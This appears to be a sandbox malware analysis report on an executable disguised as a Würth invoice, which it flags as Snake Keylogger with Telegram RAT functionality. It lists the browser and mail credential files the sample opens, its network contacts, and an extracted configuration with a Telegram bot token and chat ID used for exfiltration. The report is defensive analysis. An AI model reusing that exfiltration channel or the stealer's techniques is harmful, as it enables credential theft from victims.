Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ED7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Enables debug privileges

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Code function: 0_2_0040604F GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040604F

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
142.250.185.206	drive.google.com	United States	15169	GOOGLEUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
216.58.206.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	142.250.185.206	true
drive.usercontent.google.com	216.58.206.65	true
reallyfreegeoip.org	188.114.96.3	true
api.telegram.org	149.154.167.220	true
checkip.dyndns.com	132.226.8.169	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2019/10/2024%20/%2007:08:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/155.94.241.186	false		unknown

AV Detection

Found malware configuration

Source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7777204705:AAGdGJgXaEaWvE6yXv7RvWYjJkTQCsiDnJc", "Chat_id": "7698865320", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Wuerth_factura_4052073226..exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Wuerth_factura_4052073226..exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F87A8 CryptUnprotectData,		4_2_3A5F87A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_3A5F8EF1 CryptUnprotectData,		4_2_3A5F8EF1

Uses 32bit PE files

Source: Wuerth_factura_4052073226..exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49980 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2

Source: Wuerth_factura_4052073226..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,	0_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_00406370 FindFirstFileW,FindClose,	4_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_0040581E DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DF45Dh	4_2_000DF2C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DF45Dh	4_2_000DF4AC
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DF45Dh	4_2_000DF52F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 000DFC19h	4_2_000DF974
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB31E0h	4_2_39DB2DC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB2C19h	4_2_39DB2968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB31E0h	4_2_39DB2DB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBDC51h	4_2_39DBD9A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBD7F9h	4_2_39DBD550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB31E0h	4_2_39DB310E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBD3A1h	4_2_39DBD0F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBCF49h	4_2_39DBCCA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39DB0853
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39DB0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBFAB9h	4_2_39DBF810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBF661h	4_2_39DBF3B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBF209h	4_2_39DBEF60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBEDB1h	4_2_39DBEB08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB0D0Dh	4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DB1697h	4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBE959h	4_2_39DBE6B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBE501h	4_2_39DBE258
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_39DB0673
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 39DBE0A9h	4_2_39DBDE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F5179h	4_2_3A5F4ED0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F7EB5h	4_2_3A5F7B78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F9280h	4_2_3A5F8FB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F1CF9h	4_2_3A5F1A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FD146h	4_2_3A5FCE78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F4D21h	4_2_3A5F4A78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F7119h	4_2_3A5F6E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FF136h	4_2_3A5FEE68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F6CC1h	4_2_3A5F6A18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F48C9h	4_2_3A5F4620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F7571h	4_2_3A5F72C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FF5C6h	4_2_3A5FF2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F2151h	4_2_3A5F1EA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F2A01h	4_2_3A5F2758
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FB5E6h	4_2_3A5FB318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FD5D6h	4_2_3A5FD308
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F25A9h	4_2_3A5F2300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F55D1h	4_2_3A5F5328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F79C9h	4_2_3A5F7720
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F5E81h	4_2_3A5F5BD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FDA66h	4_2_3A5FD798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FFA56h	4_2_3A5FF788
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F5A29h	4_2_3A5F5780
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F2E59h	4_2_3A5F2BB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FBA76h	4_2_3A5FB7A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F02E9h	4_2_3A5F0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F3709h	4_2_3A5F3460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F32B1h	4_2_3A5F3008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FBF06h	4_2_3A5FBC38
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F62D9h	4_2_3A5F6030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FDEF6h	4_2_3A5FDC28
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FC396h	4_2_3A5FC0C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F0B99h	4_2_3A5F08F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F0741h	4_2_3A5F0498
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F6733h	4_2_3A5F6488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then mov esp, ebp	4_2_3A5FB081
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FE386h	4_2_3A5FE0B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FC826h	4_2_3A5FC558
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FE816h	4_2_3A5FE548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F0FF1h	4_2_3A5F0D48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FECA6h	4_2_3A5FE9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F18A1h	4_2_3A5F15F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5FCCB6h	4_2_3A5FC9E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A5F1449h	4_2_3A5F11A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A666970h	4_2_3A666678
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A666347h	4_2_3A665FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66A2D0h	4_2_3A669FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A660C2Eh	4_2_3A660960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668158h	4_2_3A667E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66AC60h	4_2_3A66A968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66D768h	4_2_3A66D470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A664746h	4_2_3A664478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66030Eh	4_2_3A660040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A666E38h	4_2_3A666B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A665E16h	4_2_3A665B48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A669940h	4_2_3A669648
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66C448h	4_2_3A66C150
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663E26h	4_2_3A663B58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66EF50h	4_2_3A66EC58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66F418h	4_2_3A66F120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6654F6h	4_2_3A665228
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668620h	4_2_3A668328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66B128h	4_2_3A66AE30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663506h	4_2_3A663238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66DC30h	4_2_3A66D938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66E0F8h	4_2_3A66DE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A664BD7h	4_2_3A664908
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A667300h	4_2_3A667008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6619DEh	4_2_3A661710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A669E08h	4_2_3A669B10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A662BE6h	4_2_3A662918
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66C910h	4_2_3A66C618
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66CDD8h	4_2_3A66CAE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6642B6h	4_2_3A663FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66F8E0h	4_2_3A66F5E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6610BEh	4_2_3A660DF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668AE8h	4_2_3A6687F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6622C6h	4_2_3A661FF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66B5F0h	4_2_3A66B2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66BAB8h	4_2_3A66B7C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663996h	4_2_3A6636C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66E5C0h	4_2_3A66E2C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66079Eh	4_2_3A6604D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A6677C8h	4_2_3A6674D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A661E47h	4_2_3A661BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66A798h	4_2_3A66A4A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A663076h	4_2_3A662DA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66D2A0h	4_2_3A66CFA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66FDA8h	4_2_3A66FAB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A665986h	4_2_3A6656B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A668FB0h	4_2_3A668CB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66154Eh	4_2_3A661280
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A669478h	4_2_3A669180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A662756h	4_2_3A662488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66BF80h	4_2_3A66BC88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A66EA88h	4_2_3A66E790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A665066h	4_2_3A664D98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A667C90h	4_2_3A667998
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691FE8h	4_2_3A691CF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A690338h	4_2_3A690040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691B20h	4_2_3A691828
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691190h	4_2_3A690E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A691658h	4_2_3A691360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A690801h	4_2_3A690508
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then jmp 3A690CC8h	4_2_3A6909D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A813E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A813E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A810A10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A8108DE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A810960

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
